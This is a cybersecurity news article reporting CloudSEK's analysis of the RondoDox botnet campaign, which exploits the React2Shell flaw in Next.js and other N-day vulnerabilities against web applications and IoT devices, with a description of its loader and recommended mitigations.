Cybersecurity researchers have uncovered a persistent, nine-month-long campaign utilizing the recently disclosed React2Shell vulnerability to build the RondoDox botnet. This sophisticated attack has systematically targeted Internet of Things (IoT) devices and web applications, enrolling them into a growing network of compromised systems. The campaign’s evolution highlights the increasing threat posed by the exploitation of zero-day and N-day vulnerabilities.
As of December 2025, threat actors have been observed leveraging the critical React2Shell flaw (CVE-2025-55182) as a primary entry point. This vulnerability, with a CVSS score of 10.0, allows unauthenticated attackers to achieve remote code execution on susceptible devices, particularly those running React Server Components (RSC) and Next.js. The Shadowserver Foundation reported approximately 90,300 vulnerable instances globally as of December 31, 2025, with a significant concentration in the United States.
RondoDox Botnet Evolves with New Exploits
The RondoDox botnet, first detected in early 2025, has demonstrated a strategic expansion of its attack vectors. Beyond the initial exploitation of React2Shell, the campaign has incorporated other N-day security vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. This multi-pronged approach suggests a well-resourced and adaptable threat actor, capable of pivoting to new exploits as they are discovered. Prominent cybersecurity firms like Darktrace, Kaspersky, and VulnCheck have previously reported on the use of React2Shell to propagate the botnet.
CloudSEK’s analysis indicates that the RondoDox campaign has progressed through distinct phases. Initially, from March to April 2025, the attackers focused on reconnaissance and manual vulnerability scanning. This was followed by a period of daily mass vulnerability probing targeting popular web applications like WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers, between April and June 2025. Since July, the campaign has escalated to hourly automated deployments, significantly increasing its scale and reach.
The detected malicious activity in December 2025 saw threat actors actively scanning for vulnerable Next.js servers. Upon successful compromise, they attempted to deploy cryptocurrency miners, a botnet loader and health checker, and a variant of the Mirai botnet. The botnet loader, identified by the path “/nuts/bolts,” plays a crucial role in preparing the compromised device for the main bot payload.
Botnet Loader’s Role in System Compromise
The “/nuts/bolts” component is designed to eliminate competing malware and cryptocurrency miners that may already be present on an infected device. This ensures that RondoDox has exclusive control over the system’s resources. Furthermore, it is responsible for downloading the primary bot binary from the attacker’s command-and-control (C2) server. One observed variant of this tool demonstrated advanced capabilities, including the removal of known botnets, Docker-based payloads, and residual artifacts from previous infections. It also systematically cleans up associated cron jobs and establishes persistence by modifying “/etc/crontab.”
To prevent reinfection by rival threat actors, the botnet loader continuously monitors running processes. CloudSEK reported that it actively kills non-whitelisted processes approximately every 45 seconds, effectively creating a hostile environment for other malware. This aggressive approach to maintaining control is a hallmark of sophisticated botnet operations.
Organizations are strongly advised to implement immediate mitigation strategies to counter the threat posed by RondoDox and similar evolving botnets. Updating Next.js to a patched version is paramount for protecting web applications. For IoT devices, segmenting them into dedicated VLANs can limit the blast radius of a compromise. The deployment of Web Application Firewalls (WAFs) can provide an additional layer of defense against web-based attacks.
Continuous monitoring for suspicious process execution and blocking known C2 infrastructure are essential ongoing security practices. The ongoing evolution of the RondoDox botnet, particularly its adoption of newly disclosed vulnerabilities like React2Shell, underscores the dynamic nature of cybersecurity threats. The ongoing efforts by threat actors to expand their botnet infrastructure suggest a continued focus on leveraging compromised devices for malicious activities such as cryptocurrency mining and distributed denial-of-service (DDoS) attacks. Security professionals will be closely monitoring for further adaptations by the RondoDox operators and the emergence of new exploitation vectors.